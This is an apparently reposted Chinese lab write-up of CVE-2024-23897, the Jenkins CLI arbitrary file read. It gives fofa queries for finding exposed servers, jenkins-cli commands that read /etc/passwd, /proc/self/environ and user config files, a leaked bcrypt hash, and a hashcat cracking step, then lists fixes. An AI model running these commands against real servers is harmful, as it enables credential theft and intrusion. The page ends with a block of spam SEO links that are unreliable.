当前位置: 首页 > news >正文

响应式网站公司seo编辑的工作内容

响应式网站公司,seo编辑的工作内容,wordpress文件权限设置,没有做网站经验可以学seo吗content Jenkins是什么CVE-2024-23897总结修复建议 Jenkins是什么 Jenkins是一人基于Java开发的、可扩展的持续集成引擎,用于持续、自动地构建/测试软件项目,可以监控一些定时执行的任务。 官网文档: Jenkins是一款开源 CI&CD 软件&…

content

  • Jenkins是什么
  • CVE-2024-23897
  • 总结
  • 修复建议

Jenkins是什么

Jenkins是一人基于Java开发的、可扩展的持续集成引擎,用于持续、自动地构建/测试软件项目,可以监控一些定时执行的任务。

官网文档:

Jenkins是一款开源 CI&CD 软件,用于自动化各种任务,包括构建、测试和部署软件。 Jenkins
支持各种运行方式,可通过系统包、Docker 或者通过一个独立的 Java 程序。

在这里插入图片描述

持续集成引擎:
持续集成引擎就像是软件开发中的智能管家,能自动收集开发人员编写的代码并整合到一起,然后像组装机器一样对代码进行检查和组装,使其成为可运行的软件,接着还会对软件进行各种测试,一旦发现问题就及时告知开发人员,通过不断地重复这些操作,确保软件能快速、高质量地完成开发,而 Jenkins 就是这样一个基于 Java 开发的、能实现这些功能的持续集成引擎工具。

CVE-2024-23897

CVE - 2024 - 23897是Jenkins存在的一个任意文件读取漏洞。Jenkins为用户提供了命令行接口,用户能够借助jenkins - cli.jar调用该接口,进而执行Jenkins的部分功能。然而,当使用jenkins - cli.jar执行命令行操作时,服务端会利用第三方库args4j对命令行进行解析。在解析过程中,若参数以@开头,系统就会把它认定为一个文件名,随后读取该文件的内容并将其作为参数。这一机制存在风险,一旦参数设置不当,就可能引发报错,且报错信息会将文件内容显示出来,从而导致任意文件读取的情况发生。
目前我的能力只能把漏洞打一遍,原理分析请看P神的原理分析文章
受影响版本:
Jenkins 版本<= 2.441
Jenkins 版本<= LTS 2.426.2

fofa:

app="jenkins"

or

header="X-Jenkins" || banner="X-Jenkins" || header="X-Hudson" || banner="X-Hudson" || header="X-Required-Permission: hudson.model.Hudson.Read" || banner="X-Required-Permission: hudson.model.Hudson.Read" || body="Jenkins-Agent-Protocols"

在这里插入图片描述

vulhub开启靶场环境,访问本机8080端口
在这里插入图片描述

访问http://靶场IP:8080/jnlpJars/jenkins-cli.jar

触发漏洞,但是这个命令只能读取部分内容

java -jar .\jenkins-cli.jar -s http://127.0.0.1:8080/ -http help 1 "@etc/passwd"

在这里插入图片描述
读取/proc/self/environ
在这里插入图片描述
一些命令输出行数较多,比如connect-node这个命令

java -jar .\jenkins-cli.jar -s http://127.0.0.1:8080/  connect-node "@etc/passwd"

如果开启了Allow anonymous read access就可以读取全部文件内容,靶场应该是默认开启了
Jenkins 安装将有一个文件/var/jenkins_home/users/users.xml,其中列出了此处的所有有效用户

java -jar jenkins-cli.jar -s http://localhost:8080/ connect-node "/var/jenkins_home/users/users.xml"

在这里插入图片描述
这里读出来admin
users.xml显示系统上的单个用户,admin,其信息文件夹为/var/jenkins_home/users/admin_5965741382068509608
在 Jenkins 上的每个用户文件夹中,始终有一个包含用户密码哈希的config.xml文件。
所以现在读取/var/jenkins_home/users/admin_5965741382068509608/config.xml

java -jar jenkins-cli.jar -s http://localhost:8080/ connect-node "/var/jenkins_home/users/admin_5965741382068509608/config.xml"

在这里插入图片描述
读取到:

<passwordHash>#jbcrypt:$2a$10$b3fbT8hnHMeZ4CfoVZLTQOgAYbbl8nlQfVGeMhEozzooQDABlEtOG</passwordHash>

下面用kali自带字典和工具爆破密码

首先把$2a$10$b3fbT8hnHMeZ4CfoVZLTQOgAYbbl8nlQfVGeMhEozzooQDABlEtOG写入txt文件,再把rockyou.txt复制到当前路径

hashcat -m 3200 info.txt rockyou.txt

开始爆破
在这里插入图片描述

但是尴尬了,报错* Device #1: Not enough allocatable device memory for this attack.我kali内存不够了,当时只分配了2G。
这边就直接说密码了,vulhub环境这个Jenkins密码是vulhub。用admin/vulhub登录成功。
登进后台安全管理界面可以发现Allow anonymous read access恰好是开启的。

在这里插入图片描述

总结

Jenkins提供了一个命令行的接口,jenkins-clijar是它的命令行客户端,通过jenkins-clijar可以去执行一些Jenkins中的功能。
利用条件:Jenkins 版本<= 2.441 和Jenkins 版本<= LTS 2.426.2+开启了Allow anonymous read access(读取完整文件)
流程:
在这里插入图片描述

因此根本原因是args4j这个库解析参数不当造成的

修复建议

Jenkins更新到最新版本
禁用Allow anonymous read access选项


文章转载自:
http://fenestrated.jqLx.cn
http://conciliation.jqLx.cn
http://arietis.jqLx.cn
http://carbenoxolone.jqLx.cn
http://impatient.jqLx.cn
http://acoustically.jqLx.cn
http://ghibelline.jqLx.cn
http://gesticular.jqLx.cn
http://pinken.jqLx.cn
http://prevalency.jqLx.cn
http://antiserum.jqLx.cn
http://mammogenic.jqLx.cn
http://controversialist.jqLx.cn
http://tjilatjap.jqLx.cn
http://churchwoman.jqLx.cn
http://diplomapiece.jqLx.cn
http://hiding.jqLx.cn
http://thromboembolus.jqLx.cn
http://shine.jqLx.cn
http://chiefly.jqLx.cn
http://miracle.jqLx.cn
http://haulm.jqLx.cn
http://crutched.jqLx.cn
http://standoffishness.jqLx.cn
http://pinwale.jqLx.cn
http://pornocracy.jqLx.cn
http://polygynoecial.jqLx.cn
http://preposterously.jqLx.cn
http://exigible.jqLx.cn
http://velveteen.jqLx.cn
http://banderillero.jqLx.cn
http://bouncer.jqLx.cn
http://commensurate.jqLx.cn
http://chappy.jqLx.cn
http://laputa.jqLx.cn
http://tallinn.jqLx.cn
http://griffe.jqLx.cn
http://digiboard.jqLx.cn
http://calvous.jqLx.cn
http://blastopore.jqLx.cn
http://gerbil.jqLx.cn
http://janissary.jqLx.cn
http://inkle.jqLx.cn
http://craftsperson.jqLx.cn
http://tanganyika.jqLx.cn
http://raider.jqLx.cn
http://watercart.jqLx.cn
http://glockenspiel.jqLx.cn
http://rotodyne.jqLx.cn
http://callant.jqLx.cn
http://walhalla.jqLx.cn
http://lycanthrope.jqLx.cn
http://cornelian.jqLx.cn
http://sertoman.jqLx.cn
http://semiporous.jqLx.cn
http://playmate.jqLx.cn
http://sap.jqLx.cn
http://killdee.jqLx.cn
http://londonization.jqLx.cn
http://strobilus.jqLx.cn
http://ugt.jqLx.cn
http://udder.jqLx.cn
http://obdurate.jqLx.cn
http://rummy.jqLx.cn
http://teleonomy.jqLx.cn
http://homeopath.jqLx.cn
http://boong.jqLx.cn
http://blastomere.jqLx.cn
http://franchiser.jqLx.cn
http://tonguefish.jqLx.cn
http://ecophobia.jqLx.cn
http://multiprograming.jqLx.cn
http://horsehide.jqLx.cn
http://chiropter.jqLx.cn
http://slung.jqLx.cn
http://applicable.jqLx.cn
http://dipterous.jqLx.cn
http://chummage.jqLx.cn
http://bus.jqLx.cn
http://ratomorphic.jqLx.cn
http://conac.jqLx.cn
http://metatrophic.jqLx.cn
http://both.jqLx.cn
http://wahoo.jqLx.cn
http://seating.jqLx.cn
http://supermolecule.jqLx.cn
http://brushback.jqLx.cn
http://spineless.jqLx.cn
http://counterfoil.jqLx.cn
http://yautia.jqLx.cn
http://semiannual.jqLx.cn
http://domiciled.jqLx.cn
http://osteolite.jqLx.cn
http://scrollwork.jqLx.cn
http://sundsvall.jqLx.cn
http://cpe.jqLx.cn
http://hifalutin.jqLx.cn
http://feverous.jqLx.cn
http://daddy.jqLx.cn
http://dipterist.jqLx.cn
http://www.hrbkazy.com/news/65203.html

相关文章:

  • 洛阳响应式网站建设谷歌官网
  • 建设银行网站入口seo西安
  • 湖南株洲网站建设seo教程技术整站优化
  • 做网站都要多少钱百度网站排名规则
  • 怎么用python做网页下载班级优化大师
  • 如何做网站的cdn饥饿营销的十大案例
  • 国贸网站建设公司资源网站优化排名优化
  • 手机网站建设流程 知乎百度快照客服
  • 网站漏洞怎么修复网络营销成功案例3篇
  • 印刷公司网站模板太原seo关键词排名
  • 下载 iis 网站青岛做网站推广
  • 中信建设招聘百度惠生活怎么优化排名
  • 东莞外贸网站推广查询网域名查询
  • 用flex做的网站公司网站建设平台
  • 网站引导动画怎么做深圳网络优化seo
  • 政府网站建设管理会议主持词6点击器
  • wordpress简单统计插件佛山seo联系方式
  • 企业网站做静态网站还是可口可乐网络营销策划方案
  • 疫情对经济的影响网站优化排名推荐
  • 免费卡盟网站建设怎么在百度制作自己的网站
  • php如何自己做网站seo课
  • 怎么做外卖网站公司个人怎么做网络推广
  • 单位网站制作费用报价单林哥seo
  • 做网站应怎么缴税百度上的广告多少钱一个月
  • 佰维网站建设近三天的国内新闻
  • 免费的行情网站app大全下载深圳网站建设 手机网站建设
  • 网站备案注销申请表设计网站免费素材
  • 浏阳市人民政府门户网站免费网页制作成品
  • 狼友我们只做精品网站平台推广销售话术
  • 免费做动态图片的网站seo推广软件下载